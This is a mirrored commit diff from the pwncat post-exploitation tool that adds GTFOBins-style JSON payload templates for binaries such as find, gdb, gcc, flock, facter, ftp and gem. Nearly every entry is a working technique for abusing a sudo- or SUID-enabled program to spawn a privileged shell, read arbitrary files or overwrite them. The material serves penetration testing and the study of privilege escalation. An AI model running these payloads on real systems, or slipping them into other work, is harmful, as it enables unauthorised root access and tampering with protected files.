1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Added more GTFObins

This commit is contained in:
John Hammond 2020-05-17 19:35:49 -04:00
parent 14c67f9b4b
commit c930925d27

View File

@ -209,33 +209,6 @@
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
],
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"base32": [
{
@ -641,7 +614,192 @@
"args": ["$TF"]
}
],
//-------------------------------------------------------------------
"expand": [
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["{lfile}"]
}
],
//-------------------------------------------------------------------
"expect": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"spawn {shell} -p; interact\""],
"exit": "exit\n"
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-c", "\"spawn {cat} {lfile}; interact\""]
}
// Theoretically we should be able to get File Write for this.
// Sine it has it own little subprocess, I can't seem to get stdin to funnel in.
],
//-------------------------------------------------------------------
"facter": [
{
"type": "shell",
"payload": "TF=$({mktemp} -d); echo 'exec(\"{shell} -p\")' > $TF/x.rb; FACTERLIB=$TF {command}",
"args": [""]
}
// This does not behave with sudo very often.
// Because it sets an environment variable, -E must be used
// when calling sudo (which pwncat currently does not have support for)
// and the user needs to be able to preserve the environment...
],
//-------------------------------------------------------------------
"find": [
{
"type": "shell",
"payload": "{command}",
"args": [".", "-exec", "{shell} -p", "\\;", "-quit"]
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": [".", "-exec", "{cat} {lfile}", "\\;", "-quit"]
}
],
//-------------------------------------------------------------------
"flock": [
{
"type": "shell",
"payload": "{command}",
"args": ["-u", "/", "{shell} -p"]
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-u", "/", "{cat} {lfile}"]
},
{
"type": "write",
"stream": "base64",
"payload": "{command}",
"args": ["-u", "/", "{sh} -c \"{base64} -d > {lfile}\""],
"exit": "{ctrl_d}{ctrl_d}"
}
],
//-------------------------------------------------------------------
"fmt": [
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-pNON_EXISTING_PREFIX", "{lfile}"]
}
],
//-------------------------------------------------------------------
"fold": [
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-w99999999", "{lfile}"]
}
],
//-------------------------------------------------------------------
"ftp": [
{
"type": "shell",
"payload": "{command}",
"input": "!{shell} -p\n",
// Exit the shell, then exit the FTP client
"exit": "exit\nexit\n"
}
],
//-------------------------------------------------------------------
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
],
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"gcc": [
{
"type": "shell",
"payload": "{command}",
"args": ["-wrapper", "{shell},-p,-s", "."]
}
],
//-------------------------------------------------------------------
"gdb": [
{
"type": "shell",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'!{shell} -p'", "-ex", "quit"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'python import os; os.execl(\"{shell}\", \"{shell}\", \"-p\")'", "-ex", "quit"]
},
{
"type": "read",
"stream":"print",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'set height 0'", "-ex", "'python print(open(\"{lfile}\").read())'", "-ex", "quit"]
},
{
"type": "write",
"stream":"print",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"],
"exit": "{ctrl_d}{ctrl_d}"
}
// We SHOULD be able to read base64 data... but for the life of me, I cannot get the whole file to come through. Leaving this alone.
// {
// "type": "write",
// "stream":"base64",
// "payload": "{command}",
// "args": ["-q", "-nx", "-ex", "'python import sys,base64; exec(\"\"\"with open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")'", "-ex", "quit"],
// "exit" : "{ctrl_d}"
// }
// ,
],
//-------------------------------------------------------------------
"gem": [
{
"type": "shell",
"payload": "{command}",
"args": ["open", "-e", "'{shell} -c {shell} -p'", "rdoc"]
},
{
"type": "read",
"stream" : "raw",
"payload": "{command}",
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
}
],